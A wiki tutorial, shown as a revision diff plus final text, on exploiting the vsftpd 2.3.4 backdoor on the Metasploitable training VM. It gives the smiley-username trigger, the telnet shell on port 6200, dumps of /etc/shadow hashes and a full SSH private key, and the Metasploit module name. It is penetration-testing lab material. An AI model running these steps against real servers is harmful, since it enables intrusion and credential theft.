Metasploitable/VSFTP: Difference between revisions
From charlesreid1
No edit summary |
|||
| (11 intermediate revisions by the same user not shown) | |||
| Line 1: | Line 1: | ||
=The Background= | =The Background= | ||
VSFPT is an ftp server program | VSFPT is an ftp server program. | ||
If a client attempts to connect using a username that ends in a smiley <code>:)</code>, it opens a backdoor shell listening on port 6200. | Version 2.3.4 of vsftp contained a backdoor that was slipped into the servers hosting the source code by an unknown person. The particular version of VSFTP included on the Metasploitable virtual machine contains a vulnerability that opens a backdoor shell. If a client attempts to connect using a username that ends in a smiley <code>:)</code>, it opens a backdoor shell listening on port 6200. (Kind of like [[2600]] - get it?) | ||
=Opening | This allows the user to obtain a root shell, view the contents of files, modify things, etc., all by attempting to login with a username ending in :). (Note that the login attempt DOES NOT have to be successful!) | ||
The original blog post about this issue: http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html | |||
Pastebin containing backdoor code that was inserted: http://pastebin.com/AetT9sS5 | |||
Rapid7 exploit information: https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor | |||
=Backdoor (Manual)= | |||
==Opening Backdoor== | |||
The procedure for opening a backdoor on port 6200 with VSFTP is as follows: | The procedure for opening a backdoor on port 6200 with VSFTP is as follows: | ||
| Line 12: | Line 22: | ||
<pre> | <pre> | ||
root@morpheus:~# nmap -sS | root@morpheus:~# nmap -sS -p 6200 10.0.0.27 | ||
Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 | Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 07:33 PDT | ||
Nmap scan report for 10.0.0.27 | Nmap scan report for 10.0.0.27 | ||
Host is up (0. | Host is up (0.00077s latency). | ||
PORT STATE SERVICE | PORT STATE SERVICE | ||
6200/tcp closed unknown | 6200/tcp closed unknown | ||
MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC) | MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC) | ||
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds | |||
Nmap done: 1 IP address (1 host up) scanned in | |||
</pre> | </pre> | ||
| Line 49: | Line 52: | ||
<pre> | <pre> | ||
root@morpheus:~# nmap -sS | root@morpheus:~# nmap -sS -p 6200 10.0.0.27 | ||
Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 | Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 07:34 PDT | ||
Nmap scan report for 10.0.0.27 | Nmap scan report for 10.0.0.27 | ||
Host is up (0. | Host is up (0.0010s latency). | ||
PORT STATE SERVICE | PORT STATE SERVICE | ||
6200/tcp open unknown | 6200/tcp open unknown | ||
MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC) | MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC) | ||
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds | |||
</pre> | |||
==Utilizing Backdoor== | |||
To utilize the backdoor, connect to port 6200 with a telnet client. | |||
Then you can execute shell commands by running <code>command_name args;</code> then press enter. | |||
For example, to dump the contents of the <code>/etc/shadow</code> file: | |||
<pre> | |||
# telnet 10.0.0.27 6200 | |||
Trying 10.0.0.27... | |||
Connected to 10.0.0.27. | |||
Escape character is '^]'. | |||
ls; | |||
bin | |||
boot | |||
cdrom | |||
dev | |||
etc | |||
home | |||
initrd | |||
initrd.img | |||
lib | |||
lost+found | |||
media | |||
mnt | |||
nohup.out | |||
opt | |||
proc | |||
root | |||
sbin | |||
srv | |||
sys | |||
tmp | |||
usr | |||
var | |||
vmlinuz | |||
cat /etc/shadow; | |||
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7::: | |||
daemon:*:14684:0:99999:7::: | |||
bin:*:14684:0:99999:7::: | |||
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7::: | |||
sync:*:14684:0:99999:7::: | |||
games:*:14684:0:99999:7::: | |||
man:*:14684:0:99999:7::: | |||
lp:*:14684:0:99999:7::: | |||
mail:*:14684:0:99999:7::: | |||
news:*:14684:0:99999:7::: | |||
uucp:*:14684:0:99999:7::: | |||
proxy:*:14684:0:99999:7::: | |||
www-data:*:14684:0:99999:7::: | |||
backup:*:14684:0:99999:7::: | |||
list:*:14684:0:99999:7::: | |||
irc:*:14684:0:99999:7::: | |||
gnats:*:14684:0:99999:7::: | |||
nobody:*:14684:0:99999:7::: | |||
libuuid:!:14684:0:99999:7::: | |||
dhcp:*:14684:0:99999:7::: | |||
syslog:*:14684:0:99999:7::: | |||
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7::: | |||
sshd:*:14684:0:99999:7::: | |||
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7::: | |||
bind:*:14685:0:99999:7::: | |||
postfix:*:14685:0:99999:7::: | |||
ftp:*:14685:0:99999:7::: | |||
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7::: | |||
mysql:!:14685:0:99999:7::: | |||
tomcat55:*:14691:0:99999:7::: | |||
distccd:*:14698:0:99999:7::: | |||
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7::: | |||
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7::: | |||
telnetd:*:14715:0:99999:7::: | |||
proftpd:!:14727:0:99999:7::: | |||
statd:*:15474:0:99999:7::: | |||
snmp:*:15480:0:99999:7::: | |||
</pre> | |||
You can even grab ssh key information: | |||
<pre> | |||
cat authorized_keys; | |||
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable | |||
cat known_hosts; | |||
|1|gS7DWzAxRvtufzEYnaW40GOvYu0=|5afWvF6s4R5Yaog0mimuOyNfXiI= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAstqnuFMBOZvO3WTEjP4TUdjgWkIVNdTq6kboEDjteOfc65TlI7sRvQBwqAhQjeeyyIk8T55gMDkOD0akSlSXvLDcmcdYfxeIF0ZSuT+nkRhij7XSSA/Oc5QSk3sJ/SInfb78e3anbRHpmkJcVgETJ5WhKObUNf1AKZW++4Xlc63M4KI5cjvMMIPEVOyR3AKmI78Fo3HJjYucg87JjLeC66I7+dlEYX6zT8i1XYwa/L1vZ3qSJISGVu8kRPikMv/cNSvki4j+qDYyZ2E5497W87+Ed46/8P42LNGoOV8OcX/ro6pAcbEPUdUEfkJrqi2YXbhvwIJ0gFMb6wfe5cnQew== | |||
</pre> | </pre> | ||
===Stealing Private Key=== | |||
We can steal the SSH private key of the msfadmin user using the backdoor shell we opened with VSFTP. | |||
<pre> | |||
ls /home; | |||
ftp | |||
msfadmin | |||
service | |||
user | |||
ls /home/msfadmin/; | |||
vulnerable | |||
ls -la /home/msfadmin/; | |||
total 36 | |||
drwxr-xr-x 7 msfadmin msfadmin 4096 Mar 23 06:25 . | |||
drwxr-xr-x 6 root root 4096 Apr 16 2010 .. | |||
lrwxrwxrwx 1 root root 9 May 14 2012 .bash_history -> /dev/null | |||
drwxr-xr-x 4 msfadmin msfadmin 4096 Apr 17 2010 .distcc | |||
drwx------ 2 msfadmin msfadmin 4096 Mar 23 06:25 .gconf | |||
drwx------ 2 msfadmin msfadmin 4096 Mar 23 06:25 .gconfd | |||
-rw-r--r-- 1 msfadmin msfadmin 586 Mar 16 2010 .profile | |||
-rwx------ 1 msfadmin msfadmin 4 May 20 2012 .rhosts | |||
drwx------ 2 msfadmin msfadmin 4096 May 17 2010 .ssh | |||
drwxr-xr-x 6 msfadmin msfadmin 4096 Apr 27 2010 vulnerable | |||
ls -la /home/msfadmin/.ssh; | |||
total 20 | |||
drwx------ 2 msfadmin msfadmin 4096 May 17 2010 . | |||
drwxr-xr-x 7 msfadmin msfadmin 4096 Mar 23 06:25 .. | |||
-rw-r--r-- 1 msfadmin msfadmin 609 May 7 2010 authorized_keys | |||
-rw------- 1 msfadmin msfadmin 1675 May 17 2010 id_rsa | |||
-rw-r--r-- 1 msfadmin msfadmin 405 May 17 2010 id_rsa.pub | |||
cat /home/msfadmin/.ssh/id_rsa; | |||
-----BEGIN RSA PRIVATE KEY----- | |||
MIIEoQIBAAKCAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqld | |||
JkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qO | |||
ffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5 | |||
JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9I | |||
yhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7b | |||
wkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3wIBIwKCAQBaUjR5bUXnHGA5fd8N | |||
UqrUx0zeBQsKlv1bK5DVm1GSzLj4TU/S83B1NF5/1ihzofI7OAQvlCdUY2tHpGGa | |||
zQ6ImSpUQ5i9+GgBUOaklRL/i9cHdFv7PSonW+SvF1UKY5EidEJRb/O6oFgB5q8G | |||
JKrwu+HPNhvD+dliBnCn0JU+Op/1Af7XxAP814Rz0nZZwx+9KBWVdAAbBIQ5zpRO | |||
eBBlLSGDsnsQN/lG7w8sHDqsSt2BCK8c9ct31n14TK6HgOx3EuSbisEmKKwhWV6/ | |||
ui/qWrrzurXA4Q73wO1cPtPg4sx2JBh3EMRm9tfyCCtB1gBi0N/2L7j9xuZGGY6h | |||
JETbAoGBANI8HzRjytWBMvXh6TnMOa5S7GjoLjdA3HXhekyd9DHywrA1pby5nWP7 | |||
VNP+ORL/sSNl+jugkOVQYWGG1HZYHk+OQVo3qLiecBtp3GLsYGzANA/EDHmYMUSm | |||
4v3WnhgYMXMDxZemTcGEyLwurPHumgy5nygSEuNDKUFfWO3mymIXAoGBAMqZi3YL | |||
zDpL9Ydj6JhO51aoQVT91LpWMCgK5sREhAliWTWjlwrkroqyaWAUQYkLeyA8yUPZ | |||
PufBmrO0FkNa+4825vg48dyq6CVobHHR/GcjAzXiengi6i/tzHbA0PEai0aUmvwY | |||
OasZYEQI47geBvVD3v7D/gPDQNoXG/PWIPt5AoGBAMw6Z3S4tmkBKjCvkhrjpb9J | |||
PW05UXeA1ilesVG+Ayk096PcV9vngvNpLdVAGi+2jtHuCQa5PEx5+DLav8Nriyi2 | |||
E5l35bqoiilCQ83PriCAMpL49iz6Pn00Z3o+My1ZVJudQ5qhjVznY+oBdM3DNpAE | |||
xn6yeL+DEiI/XbPngsWvAoGAbfuU2a6iEQSp28iFlIKa10VlS2U493CdzJg0IWcF | |||
2TVjoMaFMcyZQ/pzt9B7WQY7hodl8aHRsQKzERieXxQiKSxuwUN7+3K4iVXxuiGJ | |||
BMndK+FYbRpEnaz591K6kYNwLaEg70BZ0ek0QjC2Ih7t1ZnfdFvEaHFPF05foaAg | |||
iIMCgYAsNZut02SC6hwwaWh3Uxr07s6jB8HyrET0v1vOyOe3xSJ9YPt7c1Y20OQO | |||
Fb3Yq4pdHm7AosAgtfC1eQi/xbXP73kloEmg39NZAfT3wg817FXiS2QGHXJ4/dmK | |||
94Z9XOEDocClV7hr9H//hoO8fV/PHXh0oFQvw1d+29nf+sgWDg== | |||
-----END RSA PRIVATE KEY----- | |||
</pre> | |||
While we are at it, here is the public key too: | |||
<pre> | |||
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable | |||
</pre> | |||
Because this VSFTP technique opens a backdoor whenever we want on port 6200, it is a convenient method for connecting and executing commands on the remote victim machine. However, other connection techniques may be more useful - for example, using scp without a password to deliver a payload to the victim machine. | |||
Once you have disconnected from the remote shell on port 6200, the port will close again. You can always re-open it using the same method outlined above. | |||
=Backdoor (Metasploit)= | |||
To get into the backdoor with metasploit: | |||
https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor | |||
<code>use exploit/unix/ftp/vsftpd_234_backdoor</code> | |||
=Related= | |||
{{MSFlag}} | {{MSFlag}} | ||
{{KaliFlag}} | {{KaliFlag}} | ||
Latest revision as of 04:42, 7 May 2017
The Background
VSFPT is an ftp server program.
Version 2.3.4 of vsftp contained a backdoor that was slipped into the servers hosting the source code by an unknown person. The particular version of VSFTP included on the Metasploitable virtual machine contains a vulnerability that opens a backdoor shell. If a client attempts to connect using a username that ends in a smiley :), it opens a backdoor shell listening on port 6200. (Kind of like 2600 - get it?)
This allows the user to obtain a root shell, view the contents of files, modify things, etc., all by attempting to login with a username ending in :). (Note that the login attempt DOES NOT have to be successful!)
The original blog post about this issue: http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
Pastebin containing backdoor code that was inserted: http://pastebin.com/AetT9sS5
Rapid7 exploit information: https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor
Backdoor (Manual)
Opening Backdoor
The procedure for opening a backdoor on port 6200 with VSFTP is as follows:
We begin by scanning the Metasploitable virtual machine at 10.0.0.27, to show that port 6200 is closed:
root@morpheus:~# nmap -sS -p 6200 10.0.0.27 Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 07:33 PDT Nmap scan report for 10.0.0.27 Host is up (0.00077s latency). PORT STATE SERVICE 6200/tcp closed unknown MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
Now, in another window, we open the backdoor:
root@morpheus:~# telnet 10.0.0.27 21 Trying 10.0.0.27... Connected to 10.0.0.27. Escape character is '^]'. 220 (vsFTPd 2.3.4) user backdoored:) 331 Please specify the password. pass doesnotmatter
You can close that window - you're done with it.
Now take a look at the same port 6200 with nmap:
root@morpheus:~# nmap -sS -p 6200 10.0.0.27 Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-25 07:34 PDT Nmap scan report for 10.0.0.27 Host is up (0.0010s latency). PORT STATE SERVICE 6200/tcp open unknown MAC Address: 08:00:27:47:98:AD (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
Utilizing Backdoor
To utilize the backdoor, connect to port 6200 with a telnet client.
Then you can execute shell commands by running command_name args; then press enter.
For example, to dump the contents of the /etc/shadow file:
# telnet 10.0.0.27 6200 Trying 10.0.0.27... Connected to 10.0.0.27. Escape character is '^]'. ls; bin boot cdrom dev etc home initrd initrd.img lib lost+found media mnt nohup.out opt proc root sbin srv sys tmp usr var vmlinuz cat /etc/shadow; root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7::: daemon:*:14684:0:99999:7::: bin:*:14684:0:99999:7::: sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7::: sync:*:14684:0:99999:7::: games:*:14684:0:99999:7::: man:*:14684:0:99999:7::: lp:*:14684:0:99999:7::: mail:*:14684:0:99999:7::: news:*:14684:0:99999:7::: uucp:*:14684:0:99999:7::: proxy:*:14684:0:99999:7::: www-data:*:14684:0:99999:7::: backup:*:14684:0:99999:7::: list:*:14684:0:99999:7::: irc:*:14684:0:99999:7::: gnats:*:14684:0:99999:7::: nobody:*:14684:0:99999:7::: libuuid:!:14684:0:99999:7::: dhcp:*:14684:0:99999:7::: syslog:*:14684:0:99999:7::: klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7::: sshd:*:14684:0:99999:7::: msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7::: bind:*:14685:0:99999:7::: postfix:*:14685:0:99999:7::: ftp:*:14685:0:99999:7::: postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7::: mysql:!:14685:0:99999:7::: tomcat55:*:14691:0:99999:7::: distccd:*:14698:0:99999:7::: user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7::: service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7::: telnetd:*:14715:0:99999:7::: proftpd:!:14727:0:99999:7::: statd:*:15474:0:99999:7::: snmp:*:15480:0:99999:7:::
You can even grab ssh key information:
cat authorized_keys; ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable cat known_hosts; |1|gS7DWzAxRvtufzEYnaW40GOvYu0=|5afWvF6s4R5Yaog0mimuOyNfXiI= ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAstqnuFMBOZvO3WTEjP4TUdjgWkIVNdTq6kboEDjteOfc65TlI7sRvQBwqAhQjeeyyIk8T55gMDkOD0akSlSXvLDcmcdYfxeIF0ZSuT+nkRhij7XSSA/Oc5QSk3sJ/SInfb78e3anbRHpmkJcVgETJ5WhKObUNf1AKZW++4Xlc63M4KI5cjvMMIPEVOyR3AKmI78Fo3HJjYucg87JjLeC66I7+dlEYX6zT8i1XYwa/L1vZ3qSJISGVu8kRPikMv/cNSvki4j+qDYyZ2E5497W87+Ed46/8P42LNGoOV8OcX/ro6pAcbEPUdUEfkJrqi2YXbhvwIJ0gFMb6wfe5cnQew==
Stealing Private Key
We can steal the SSH private key of the msfadmin user using the backdoor shell we opened with VSFTP.
ls /home; ftp msfadmin service user ls /home/msfadmin/; vulnerable ls -la /home/msfadmin/; total 36 drwxr-xr-x 7 msfadmin msfadmin 4096 Mar 23 06:25 . drwxr-xr-x 6 root root 4096 Apr 16 2010 .. lrwxrwxrwx 1 root root 9 May 14 2012 .bash_history -> /dev/null drwxr-xr-x 4 msfadmin msfadmin 4096 Apr 17 2010 .distcc drwx------ 2 msfadmin msfadmin 4096 Mar 23 06:25 .gconf drwx------ 2 msfadmin msfadmin 4096 Mar 23 06:25 .gconfd -rw-r--r-- 1 msfadmin msfadmin 586 Mar 16 2010 .profile -rwx------ 1 msfadmin msfadmin 4 May 20 2012 .rhosts drwx------ 2 msfadmin msfadmin 4096 May 17 2010 .ssh drwxr-xr-x 6 msfadmin msfadmin 4096 Apr 27 2010 vulnerable ls -la /home/msfadmin/.ssh; total 20 drwx------ 2 msfadmin msfadmin 4096 May 17 2010 . drwxr-xr-x 7 msfadmin msfadmin 4096 Mar 23 06:25 .. -rw-r--r-- 1 msfadmin msfadmin 609 May 7 2010 authorized_keys -rw------- 1 msfadmin msfadmin 1675 May 17 2010 id_rsa -rw-r--r-- 1 msfadmin msfadmin 405 May 17 2010 id_rsa.pub cat /home/msfadmin/.ssh/id_rsa; -----BEGIN RSA PRIVATE KEY----- MIIEoQIBAAKCAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqld JkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qO ffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5 JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9I yhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7b wkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3wIBIwKCAQBaUjR5bUXnHGA5fd8N UqrUx0zeBQsKlv1bK5DVm1GSzLj4TU/S83B1NF5/1ihzofI7OAQvlCdUY2tHpGGa zQ6ImSpUQ5i9+GgBUOaklRL/i9cHdFv7PSonW+SvF1UKY5EidEJRb/O6oFgB5q8G JKrwu+HPNhvD+dliBnCn0JU+Op/1Af7XxAP814Rz0nZZwx+9KBWVdAAbBIQ5zpRO eBBlLSGDsnsQN/lG7w8sHDqsSt2BCK8c9ct31n14TK6HgOx3EuSbisEmKKwhWV6/ ui/qWrrzurXA4Q73wO1cPtPg4sx2JBh3EMRm9tfyCCtB1gBi0N/2L7j9xuZGGY6h JETbAoGBANI8HzRjytWBMvXh6TnMOa5S7GjoLjdA3HXhekyd9DHywrA1pby5nWP7 VNP+ORL/sSNl+jugkOVQYWGG1HZYHk+OQVo3qLiecBtp3GLsYGzANA/EDHmYMUSm 4v3WnhgYMXMDxZemTcGEyLwurPHumgy5nygSEuNDKUFfWO3mymIXAoGBAMqZi3YL zDpL9Ydj6JhO51aoQVT91LpWMCgK5sREhAliWTWjlwrkroqyaWAUQYkLeyA8yUPZ PufBmrO0FkNa+4825vg48dyq6CVobHHR/GcjAzXiengi6i/tzHbA0PEai0aUmvwY OasZYEQI47geBvVD3v7D/gPDQNoXG/PWIPt5AoGBAMw6Z3S4tmkBKjCvkhrjpb9J PW05UXeA1ilesVG+Ayk096PcV9vngvNpLdVAGi+2jtHuCQa5PEx5+DLav8Nriyi2 E5l35bqoiilCQ83PriCAMpL49iz6Pn00Z3o+My1ZVJudQ5qhjVznY+oBdM3DNpAE xn6yeL+DEiI/XbPngsWvAoGAbfuU2a6iEQSp28iFlIKa10VlS2U493CdzJg0IWcF 2TVjoMaFMcyZQ/pzt9B7WQY7hodl8aHRsQKzERieXxQiKSxuwUN7+3K4iVXxuiGJ BMndK+FYbRpEnaz591K6kYNwLaEg70BZ0ek0QjC2Ih7t1ZnfdFvEaHFPF05foaAg iIMCgYAsNZut02SC6hwwaWh3Uxr07s6jB8HyrET0v1vOyOe3xSJ9YPt7c1Y20OQO Fb3Yq4pdHm7AosAgtfC1eQi/xbXP73kloEmg39NZAfT3wg817FXiS2QGHXJ4/dmK 94Z9XOEDocClV7hr9H//hoO8fV/PHXh0oFQvw1d+29nf+sgWDg== -----END RSA PRIVATE KEY-----
While we are at it, here is the public key too:
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
Because this VSFTP technique opens a backdoor whenever we want on port 6200, it is a convenient method for connecting and executing commands on the remote victim machine. However, other connection techniques may be more useful - for example, using scp without a password to deliver a payload to the victim machine.
Once you have disconnected from the remote shell on port 6200, the port will close again. You can always re-open it using the same method outlined above.
Backdoor (Metasploit)
To get into the backdoor with metasploit:
https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor
use exploit/unix/ftp/vsftpd_234_backdoor
Related
 |
Metasploit any and all resources related to metasploit on this wiki
Category:Metasploit - pages labeled with the "Metasploit" category label MSF/Wordlists - wordlists that come bundled with Metasploit MSFVenom - msfvenom is used to craft payloads Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload.
Category:Security · Category:Metasploit · Category:Kali
|
|
Metasploitable: The Red Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack.
Exploiting MySQL with Metasploit: Metasploitable/MySQL Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres
Exploiting VSFTP Backdoor: Metasploitable/VSFTP SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force SSH Penetration with Keys: Metasploitable/SSH/Keys SSH Penetration with Metasploit: Metasploitable/SSH/Exploits Brute-Forcing Exploiting NFS: Metasploitable/NFS Exploiting DNS Bind Server: Metasploitable/DNS Bind
Metasploitable Services: distcc: Metasploitable/distcc
Metasploitable Apache: Exploiting Apache (with Metasploit): Metasploitable/Apache Exploiting Apache (with Python): Metasploitable/Apache/Python Tor's Hammer DoS Attack: Metasploitable/TorsHammer * Apache DAV: Metasploitable/Apache/DAV * Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote
Metasploitable Memory: General approach to memory-based attacks: Metasploitable/Memory Investigating memory data: Metasploitable/Volatile Data Investigation Dumping Memory from Metasploit: Metasploitable/Dumping Memory
Metasploitable Fuzzing: (Have not done much work on fuzzing Metasploitable...)
Category:Security · Category:Metasploit · Category:Metasploitable · Category:Kali
|
|
Metasploitablue: The Blue Team Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions.
Hence the name, Metasploita-blue. Overview: Metasploitable/Defenses Metasploitable/Defenses/Stopping · Metasploitable/Defenses/Detecting
Metasploitable On-Machine Defenses: Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation Linux Artifact Investigation: Metasploitable/Artifact Investigation Linux Iptables Essentials: Metasploitable/Iptables Firewall Assurance and Testing: Metasploitable/Firewall Password Assessment: Metasploitable/Password Assessment Standard Unix Ports: Unix/Ports
Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat Nmap (Blue Team): Metasploitable/Nmap Network Traffic Analysis: Metasploitable/Network Traffic Analysis Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns Snort IDS: Metasploitable/Snort
|